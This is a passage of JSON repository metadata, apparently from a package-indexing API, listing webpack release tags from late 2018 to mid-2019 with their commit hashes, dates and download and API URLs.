ack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpac